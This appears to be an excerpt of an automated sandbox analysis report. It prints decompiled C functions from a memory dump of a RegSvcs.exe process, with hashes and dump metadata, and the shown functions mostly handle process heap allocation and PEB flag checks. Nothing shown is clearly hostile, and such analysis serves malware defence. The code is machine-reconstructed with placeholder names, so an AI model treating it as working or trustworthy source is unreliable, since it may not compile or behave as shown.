                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd891a18b68af3c43cc002935b7894e041cd7109bcc9391c5343c85bbd6b5191
                                          • Instruction ID: 7fa875d196a249f46f8123158b3d6786270492e3ff4c6a87b80e27a2610cda33
                                          • Opcode Fuzzy Hash: bd891a18b68af3c43cc002935b7894e041cd7109bcc9391c5343c85bbd6b5191
                                          • Instruction Fuzzy Hash: CCF0E270A0420DAFDB04DBACD845E6E77B8EF58308F100199E912EB2C0EA34DD00C758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E012F4F2E(void* __ecx, char _a4) {
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          
                                          				_t18 = __ecx;
                                          				_t21 = __ecx;
                                          				if(__ecx == 0) {
                                          					L6:
                                          					__eflags = _a4;
                                          					if(__eflags != 0) {
                                          						L8:
                                          						E013C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                          						L9:
                                          						return 0;
                                          					}
                                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          					if(__eflags != 0) {
                                          						goto L9;
                                          					}
                                          					goto L8;
                                          				}
                                          				_t18 = __ecx + 0x30;
                                          				if(E0131C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x12d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					goto L6;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}










                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99197e53812ec4ff879c222250a5769ac515776053715d8e1ffa584b809d14c0
                                          • Instruction ID: 68bac11666663d8df965c114339d57edb99bf4eea15e0fc75fd3c850387cad2c
                                          • Opcode Fuzzy Hash: 99197e53812ec4ff879c222250a5769ac515776053715d8e1ffa584b809d14c0
                                          • Instruction Fuzzy Hash: 67F0BE329256848FD7A6DB1CC5D4F22BBE4AF00B7CF045464E84587922C765ED40C640
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0132A44B(signed int __ecx) {
                                          				intOrPtr _t13;
                                          				signed int _t15;
                                          				signed int* _t16;
                                          				signed int* _t17;
                                          
                                          				_t13 =  *0x13e7b9c; // 0x0
                                          				_t15 = __ecx;
                                          				_t16 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                          				if(_t16 == 0) {
                                          					return 0;
                                          				}
                                          				 *_t16 = _t15;
                                          				_t17 =  &(_t16[2]);
                                          				E0133FA60(_t17, 0, _t15 << 2);
                                          				return _t17;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c89a834f9b40b63b94b8b388a4c9f7a77e8d41fea3051947b4884dc57fe0df2
                                          • Instruction ID: a1a2bef52cc7fbd6d86ef0140b2d0c4657bd2306372632db315d5e91eea7a18e
                                          • Opcode Fuzzy Hash: 4c89a834f9b40b63b94b8b388a4c9f7a77e8d41fea3051947b4884dc57fe0df2
                                          • Instruction Fuzzy Hash: EBE09272A05422ABD2215A18AC00F66739DDBE4659F094435E604D7754D628DD02C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E012FF358(void* __ecx, signed int __edx) {
                                          				char _v8;
                                          				signed int _t9;
                                          				void* _t20;
                                          
                                          				_push(__ecx);
                                          				_t9 = 2;
                                          				_t20 = 0;
                                          				if(E0132F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                          					_t20 = L01314620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				}
                                          				return _t20;
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: fa1d40c9c5c0405f7f66ebabf718f3c4ba1ee1b6a73384847f60f3d0784f84f5
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: FDE09A33A40128BBDB21AA9D9E05FAABAADDB58A60F0001A9BB04D7150D5749E00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0130FF60(intOrPtr _a4) {
                                          				void* __ecx;
                                          				void* __ebp;
                                          				void* _t13;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				void* _t16;
                                          				void* _t17;
                                          
                                          				_t14 = _a4;
                                          				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					return E013C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                          				} else {
                                          					return E01310050(_t14);
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9499470da7abf87532a3bc136d7a3ef7b1e112ba493cd12620ce97447f4feda
                                          • Instruction ID: aa9055d8804e74076b84eb8d974241655e0a4745cfe8142bdaeac3e0f5924b29
                                          • Opcode Fuzzy Hash: b9499470da7abf87532a3bc136d7a3ef7b1e112ba493cd12620ce97447f4feda
                                          • Instruction Fuzzy Hash: 07E0DFB020D2049FD73BDB69D060F253BDC9B52629F19805DF0084B982C661D885C296
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E013841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				void* _t5;
                                          				void* _t14;
                                          
                                          				_push(8);
                                          				_push(0x13d08f0);
                                          				_t5 = E0134D08C(__ebx, __edi, __esi);
                                          				if( *0x13e87ec == 0) {
                                          					E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                          					if( *0x13e87ec == 0) {
                                          						 *0x13e87f0 = 0x13e87ec;
                                          						 *0x13e87ec = 0x13e87ec;
                                          						 *0x13e87e8 = 0x13e87e4;
                                          						 *0x13e87e4 = 0x13e87e4;
                                          					}
                                          					 *(_t14 - 4) = 0xfffffffe;
                                          					_t5 = L01384248();
                                          				}
                                          				return E0134D0D1(_t5);
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47e5616e91e558a3048e9e72370fb5ad97dfab29d8bfd9e8eb51125623f9a890
                                          • Instruction ID: 73b1f1c6c1bb9cdae4da7204466b5583c8e74ed31800f154fb07a0fc8702cd80
                                          • Opcode Fuzzy Hash: 47e5616e91e558a3048e9e72370fb5ad97dfab29d8bfd9e8eb51125623f9a890
                                          • Instruction Fuzzy Hash: 0FF01578D90702CFCBB1EFA9A50470836E8FB54318F0041AED0048B6C8D73455A4CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013AD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				void* _t5;
                                          
                                          				if(_a4 != 0) {
                                          					_t5 = L012FE8B0(__ecx, _a4, 0xfff);
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          					return _t5;
                                          				}
                                          				return 0xc000000d;
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: 05394713e99009b203bccda1ff4193cece91fa05253e68d23190d611b639cf49
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: 61E0C231280209BBDB236E88CC00FB9BB1ADB507A4F114031FE085ABE0C6719C91D6C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0132A185() {
                                          				void* __ecx;
                                          				intOrPtr* _t5;
                                          
                                          				if( *0x13e67e4 >= 0xa) {
                                          					if(_t5 < 0x13e6800 || _t5 >= 0x13e6900) {
                                          						return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                          					} else {
                                          						goto L1;
                                          					}
                                          				} else {
                                          					L1:
                                          					return E01310010(0x13e67e0, _t5);
                                          				}
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d03126657633e77c8319f6fa4708c7d312fe5ee5f731b34f0f34d1411453ad17
                                          • Instruction ID: b04ff44226cf1bcb695b8482414ab01038957b8a7dcf52be816f4aa1840a4833
                                          • Opcode Fuzzy Hash: d03126657633e77c8319f6fa4708c7d312fe5ee5f731b34f0f34d1411453ad17
                                          • Instruction Fuzzy Hash: 00D02BF117022017C72D73048819B253693F7A477CF34080CF2034BDD4E960D8D8C108
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013216E0(void* __edx, void* __eflags) {
                                          				void* __ecx;
                                          				void* _t3;
                                          
                                          				_t3 = E01321710(0x13e67e0);
                                          				if(_t3 == 0) {
                                          					_t6 =  *[fs:0x30];
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                          						goto L1;
                                          					} else {
                                          						return L01314620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                          					}
                                          				} else {
                                          					L1:
                                          					return _t3;
                                          				}
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed355bd228ef19d68b14b909fd3968f8b4d9d15863124bc66b14c04e9239be3c
                                          • Instruction ID: 4de589ebbabb640f54fb4640e42ae9256b3109ebe10097197d0c75063c96e957
                                          • Opcode Fuzzy Hash: ed355bd228ef19d68b14b909fd3968f8b4d9d15863124bc66b14c04e9239be3c
                                          • Instruction Fuzzy Hash: 6CD0A77114021192EA3D6B1C9904B193652EBD0BADF38005CF607594C0CFA4CC92E048
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013753CA(void* __ebx) {
                                          				intOrPtr _t7;
                                          				void* _t13;
                                          				void* _t14;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          
                                          				_t13 = __ebx;
                                          				if( *((char*)(_t16 - 0x65)) != 0) {
                                          					E0130EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                          					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                          				}
                                          				if(_t15 != 0) {
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                          					return  *((intOrPtr*)(_t16 - 0x64));
                                          				}
                                          				return _t7;
                                          			}









                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 4e84480bcd741f0f714b1c71c9b43329eead79dccb17b03aa59902c2e24b172f
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: 07E08C31A446809BEF27EB5CC650F5EBBF5FB44B04F180414A0085B670C628AC00CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0130AAB0() {
                                          				intOrPtr* _t4;
                                          
                                          				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t4 != 0) {
                                          					if( *_t4 == 0) {
                                          						goto L1;
                                          					} else {
                                          						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                          					}
                                          				} else {
                                          					L1:
                                          					return 0x7ffe0030;
                                          				}
                                          			}





                                          C-Code - Quality: 100%
                                          			E013235A1(void* __eax, void* __ebx, void* __ecx) {
                                          				void* _t6;
                                          				void* _t10;
                                          				void* _t11;
                                          
                                          				_t10 = __ecx;
                                          				_t6 = __eax;
                                          				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                          					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                          				}
                                          				if( *((char*)(_t11 - 0x1a)) != 0) {
                                          					return E0130EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          				}
                                          				return _t6;
                                          			}







                                          C-Code - Quality: 100%
                                          			E012FDB40() {
                                          				signed int* _t3;
                                          				void* _t5;
                                          
                                          				_t3 = L01314620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                          				if(_t3 == 0) {
                                          					return 0;
                                          				} else {
                                          					 *_t3 =  *_t3 | 0x00000400;
                                          					return _t3;
                                          				}
                                          			}






                                          C-Code - Quality: 100%
                                          			E0137A537(intOrPtr _a4, intOrPtr _a8) {
                                          
                                          				return L01318E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                          			}




                                          C-Code - Quality: 100%
                                          			E01313A1C(intOrPtr _a4) {
                                          				void* _t5;
                                          
                                          				return L01314620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          			}





                                          C-Code - Quality: 100%
                                          			E012FAD30(intOrPtr _a4) {
                                          
                                          				return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          			}




                                          C-Code - Quality: 100%
                                          			E013076E2(void* __ecx) {
                                          				void* _t5;
                                          
                                          				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                          					return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                          				}
                                          				return _t5;
                                          			}





                                          C-Code - Quality: 100%
                                          			E013236CC(void* __ecx) {
                                          
                                          				if(__ecx > 0x7fffffff) {
                                          					return 0;
                                          				} else {
                                          					return L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                          				}
                                          			}




                                          C-Code - Quality: 100%
                                          			E01317D50() {
                                          				intOrPtr* _t3;
                                          
                                          				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t3 != 0) {
                                          					return  *_t3;
                                          				} else {
                                          					return _t3;
                                          				}
                                          			}





                                          C-Code - Quality: 100%
                                          			E01322ACB() {
                                          				void* _t5;
                                          
                                          				return E0130EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          			}




                                          0x01322adc

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: bb83edaf64cd33d8e82dbcc2ceeef07e121cb83cc1a6aabf9cd7dcd466bafee2
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: A1B01232D10841CFCF03FF44C620B1A7371FB00750F0548A0900127A70C228AC01DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
                                          • Instruction ID: 756b356390d65b8badcea5793e43d9d1787d8dd70f9aab7c6352e48ec767365a
                                          • Opcode Fuzzy Hash: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
                                          • Instruction Fuzzy Hash: 749002A530140403D540659948046070045A7E0346F51C021A2054595ECA699C557179
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
                                          • Instruction ID: 1f201ac1247d801fb1d9fa704cb999a3c1f7771114ae7267e572bf62081dbd7c
                                          • Opcode Fuzzy Hash: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
                                          • Instruction Fuzzy Hash: 609002A531100043D504619944047060085A7F1245F51C022A2144594CC5699C656169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
                                          • Instruction ID: 010cb7898c1e5fca76dc3b8ed2223e7220afba2ffb0be0c0f34fee9f21e62d55
                                          • Opcode Fuzzy Hash: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
                                          • Instruction Fuzzy Hash: 5A90027534100403D541719944046060049B7E0285F91C022A0414594EC6959E5ABAA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
                                          • Instruction ID: cb986218aeef8d4b7a72f5d34cc8a3d59789fd02280dc36f5843a9f764379375
                                          • Opcode Fuzzy Hash: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
                                          • Instruction Fuzzy Hash: 8C9002A5701140438940B19948044065055B7F1345391C131A04445A0CC6A89C59A2A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          C-Code - Quality: 26%
                                          			E0132645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				void* _v36;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				char _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t48;
                                          				intOrPtr _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr* _t52;
                                          				char _t56;
                                          				void* _t69;
                                          				char _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				void* _t82;
                                          				void* _t84;
                                          				intOrPtr _t86;
                                          				void* _t88;
                                          				signed int _t90;
                                          				signed int _t92;
                                          				signed int _t93;
                                          
                                          				_t80 = __edx;
                                          				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                          				_v8 =  *0x13ed360 ^ _t92;
                                          				_t72 = 0;
                                          				_v72 = __edx;
                                          				_t82 = __ecx;
                                          				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v68 = _t86;
                                          				E0133FA60( &_v60, 0, 0x30);
                                          				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                          				_t93 = _t92 + 0xc;
                                          				_v76 = _t48;
                                          				_t49 = _t48;
                                          				if(_t49 == 0) {
                                          					_push(5);
                                          					 *((char*)(_t82 + 0x6a)) = 0;
                                          					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                          					goto L3;
                                          				} else {
                                          					_t69 = _t49 - 1;
                                          					if(_t69 != 0) {
                                          						if(_t69 == 1) {
                                          							_push(0xa);
                                          							goto L3;
                                          						} else {
                                          							_t56 = 0;
                                          						}
                                          					} else {
                                          						_push(4);
                                          						L3:
                                          						_pop(_t50);
                                          						_v80 = _t50;
                                          						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                          							E01312280(_t50, _t86 + 0x1c);
                                          							_t79 = _v72;
                                          							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                          							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                          							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                          							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                          							E0130FFB0(_t72, _t82, _t86 + 0x1c);
                                          						}
                                          						_t75 = _v80;
                                          						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                          						_t80 =  *_t52;
                                          						_v72 =  *((intOrPtr*)(_t52 + 4));
                                          						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                          						_v60 = 0x30;
                                          						_v56 = _t75;
                                          						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                          						asm("movsd");
                                          						_v76 = _t80;
                                          						_v64 = 0x30;
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						if(_t80 != 0) {
                                          							 *0x13eb1e0(_t75, _v72,  &_v64,  &_v60);
                                          							_t72 = _v76();
                                          						}
                                          						_t56 = _t72;
                                          					}
                                          				}
                                          				_pop(_t84);
                                          				_pop(_t88);
                                          				_pop(_t73);
                                          				return E0133B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                          			}



































                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872
                                          • Opcode ID: a3594204bcdb26f651eeb108852ad060a8cf37db53a49e8862e2929769c1449a
                                          • Instruction ID: b8c39644e291d9b8fb89376ca6ef0a8052822155a081beaad8ec3676e086ccb7
                                          • Opcode Fuzzy Hash: a3594204bcdb26f651eeb108852ad060a8cf37db53a49e8862e2929769c1449a
